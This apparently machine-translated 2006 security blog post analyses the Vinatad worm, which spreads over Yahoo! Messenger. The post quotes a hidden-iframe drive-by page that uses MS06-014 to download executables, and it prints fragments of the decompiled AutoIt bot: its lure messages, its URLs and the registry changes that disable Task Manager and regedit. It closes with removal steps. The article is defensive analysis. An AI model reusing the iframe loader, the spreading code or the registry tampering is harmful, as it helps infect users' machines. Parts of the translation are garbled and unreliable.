'Fight' with Vinatad
From yesterday (November 16) until now, despite being wary of the "pandemic" virus spread through Y! M, not many people have had a temporary virus called Vinatad! TTO would like to introduce an article about this new virus from the Information Security Blog as a reference for readers.
I didn't do anything other than yesterday (and maybe all day) besides sitting and supporting the problem solving on the database system at the office. Arriving home at 11pm, tired of going to sleep, suddenly remembered that today the Vietnam Olympic team kicked with some team so I went online to see the news about that match. Just trying to go to bed, suddenly, I received a message on Yahoo! Messenger:
thuong ghe ^, vinatad is hacking you ui, hic :( http:///www.vinatad./index.html
I don't like anything like this, but this is the 4th time of the day I received 4 different messages and informed about this attack. Curious, I clicked on the link and it displayed a msg like this:
website has BKAV - That site has security by BKAV
hacked by bkgenetic_g11
Well, this index.html page doesn't simply have those two lines because NoScript tells me that a script has been blocked. Curious, I looked at its source code and saw the following:
hacked by bkgenetic_g11
[title] website has BKAV - That site has seccurity by BKAV [/ title]
[iframe name = "quag" frameSpacing = "0" old-src = "http:///www.free.s.com/iamblackhat/google.html" frameBorder = "0" noResize width = "0" height = "0" target = "_ self"]
There is a hidden iframe pointing to http:///www.free.s.com/iamblackhat/google.html . The source code for google guy. Except for the i.js file of Freewebs service used to insert banner ads, the entire script is quite interesting. As you can see, the purpose of this script is to download and run the two files http:///www.vinatad./game.exe and http:///www.vinatad./zend.exe . To do that, the author exploits the vulnerability MS06-14:
Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution (911562)
Một mã xa đã thực hiện hiện thời có quyền hạn trong RDS.Dataspace ActiveX control that is provided as part of the ActiveX Data Objects (ADO) and that is distributed in MDAC. An attacker thành công đã được kết thúc này, có thể xử lý không thể thực hiện điều khiển của hệ thống tương ứng.
This vulnerability was patched by Microsoft in April 2006, but it is still used a lot in browser-based exploits because it is easy to exploit and is quite effective because it is relatively new. Interestingly, the author took advantage of AJAX technology through the Microsoft.XMLHTTP object to silently download the virus to the victim's computer.
Listening to the made-in-VN virus, you probably guessed it used AutoIt to spread on Yahoo! Messenger as a lot of children have appeared in series recently. The difference of this virus is that it exploits a vulnerability in Internet Explorer, then through AJAX to automatically install smoothly. If you have not updated your Internet Explorer, just click on the link sent on Yahoo! Messenger is immediately infected with your computer.
I quickly downloaded two files http:///www.vinatad./zend.exe and http:///www.vinatad./game.exe . Scan results with VirusTotal are as follows:
Antivirus Version Update Result
AntiVir 7.2.0.39 11.16.2006 no virus found
Authentium 4.93.8 11.16.2006 no virus found
Avast 4.7.892.0 11.15.2006 no virus found
AVG 386 11.15.2006 no virus found
BitDefender 7.2 11.16.2006 no virus found
CAT-QuickHeal 8.00 11.15.2006 TrojanDownloader.Agent.axn
ClamAV devel-20060426 11.16.2006 no virus found
DrWeb 4.33 11.16.2006 no virus found
eTrust-InoculateIT 23.73.57 11.16.2006 no virus found
eTrust-Vet 30.3.3195 11.16.2006 no virus found
Ewido 4.0 11.15.2006 no virus found
Fortinet 2.82.0.0 11.16.2006 no virus found
F-Prot 3.16f 11.16.2006 no virus found
F-Prot4 4.2.1.29 11.16.2006 no virus found
Ikarus 0.2.65.0 11.15.2006 no virus found
Kaspersky 4.0.2.24 11.16.2006 no virus found
McAfee 4896 11.15.2006 no virus found
Microsoft 1.1609 11.16.2006 no virus found
NOD32v2 1868 11.15.2006 no virus found
Norman 5.80.02 11.15.2006 no virus found
Panda 9.0.0.4 11.15.2006 no virus found
Prevx1 V2 11.16.2006 no virus found
Sophos 4.11.0 11.15.2006 no virus found
TheHacker 6.0.1.119 11.15.2006 Trojan / Downloader.AutoIt.e
UNA 1.83 11.15.2006 Backdoor.Agent.9
VBA32 3.11.1 11.15.2006 no virus found
VirusBuster 4.3.15: 9 11.15.2006 no virus found
Only three antivirus software identified are game.exe and zend.exe . Preliminary analysis of strings shows that both files use the AutoIt engine and are packaged with UPX. I unpacked and loaded them onto the VMWare virtual machine running Windows XP Service Pack 2. It's easy to decompile the AutoIt source code of both of them because they don't use any protection method. Just use the existing Exe2AU program of AutoIt that I already have their source code in hand:
; AUT2EXE VERSION: 3.2.0.1
; -------------------------------------------------- --------------------------
; AUT2EXE INCLUDE-START: E: hoc tapnewhackdungyeuanh_mophatTeachokRungame.au3
; -------------------------------------------------- --------------------------
; ------------------------------------------------
; Phan Mem: DKC Bot
; Board: 1.1
; Cong Dung: Quang Cao Website through Y! M
; Hoan Thanh: September 1, 2006
; ------------------------------------------------- ------
The initial feeling is that these two AutoIt have a simpler function than the other AutoIt I have met before. The source code of zend.exe even has only 3 lines:
while (99999999)
ping ("localhost", 1)
WEnd
The source code of game.exe is quite "classic", divided into components such as:
; Thiet Lap
#NoTrayIcon
$ trinhduyet = "hacked by bkgenetic_g11"
$ ngaunhien = Random (0.9,1)
; Ngau Nhien website
Dim $ web [10]
$ website = "http:///www.vinatad./index.html"
$ include = "http:///www.vinatad./hotline.html"
; Tin Nhan Ngau Nhien
Dim $ news [10]
$ tin [0] = "that site hacked by bkgenetic_g11 via nutrition, phuc that, hic" & $ website
$ news [1] = "thuong ghe ^, vinatad is hacked you ui, hic :(" & $ website
$ news [2] = "This is a poet's hand, hic :(" & $ website
$ news [3] = "Den chiu, vinatad ca bi hack, VNiss lam ma ??? :))" & $ website
$ tin [4] = "bun ghe, hack hui rui ^" & $ website
$ news [5] = "that site hacked by bkgenetic_g11 via nutrition, phuc that, hic)" & $ website
$ believe [6] = "Den chiu, no gi de noi :))))" & $ website
$ believe [7] = "thuong ghe ^, vinatad bi hack you ui, hi :))" & $ website
$ news [8] = "en chiu, vinatad ca bi hack, VNiss lam ma ?? :(" & $ website
$ tin [9] = "en chiu, vinatad ca bi hack, VNiss lam ma ?? :(" & $ website
$ tinnhan = $ tin [$ ngaunhien]
; Lay Nhiem Vao He Thong
; Remember the Registry
; Replace Status & Gui Tin Nhan
When infecting the system, game.exe will copy itself into file C: Windowstaskmng.exe . Then it starts to change some information in the Registry to:
- Automatically run when Windows starts
- Modify the homepage of Internet Explorer
- Disable regedit tool and Task Manager
- Modify the Launchcast address of Yahoo! Messenger
Finally, as usual, it began to spread by sending mass messages via Yahoo! Messenger and change the status of infected people.
Although this virus is not very dangerous, the author can completely replace game.exe or zend.exe with other more powerful versions, can be written in AutoIt or edit the available source code of viruses and bots are full on the Internet. Then with the help of Yahoo! Messenger and the vulnerabilities of Internet Explorer and disaster are entirely possible. How to protect yourself? Firefox + NoScript will be a viable solution.
How to "delete" Vinatad from your device
1. Close yahoo messenger / IE
2. Delete C: WINDOWStaskmng.exe
3. Fix regitry
HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerControl Panel "Homepage" = ([REG_DWORD, value: 00000001])
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion
PoliciesSystem "DisableTaskMgr" = ([REG_DWORD, value: 00000001])
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion
PoliciesSystem "DisableRegistryTools" = ([REG_DWORD, value: 00000001])
HKEY_CURRENT_USERSoftwareMicrosoftInternet Explorer
Main "Start Page" = (http:///www.vinatad./index.html)
HKEY_CURRENT_USERSoftwareYahoopagerView
YMSGR_buzz "content url" = (http:///www.vinatad./hotline.html)
HKEY_CURRENT_USERSoftwareYahoopagerViewYMSGR_Launc
4. Restart the device
According to Pastepin
- New vaccines can fight common infections
- Children are too clean or allergic
- Over 10 million USD helps Vietnam fight HIV / AIDS
- Potatoes help fight bioterrorism
- Bodhi smoke can fight bird flu
- Close up of the battle of brown bears
- Chicken soup helps fight flu
- Change the environment to fight malaria
- The fight between sharks and arowanas
- Video: The fight of baboons
- The tomatoes contain the best antioxidants to fight disease
- The fight against spam: Phe Anti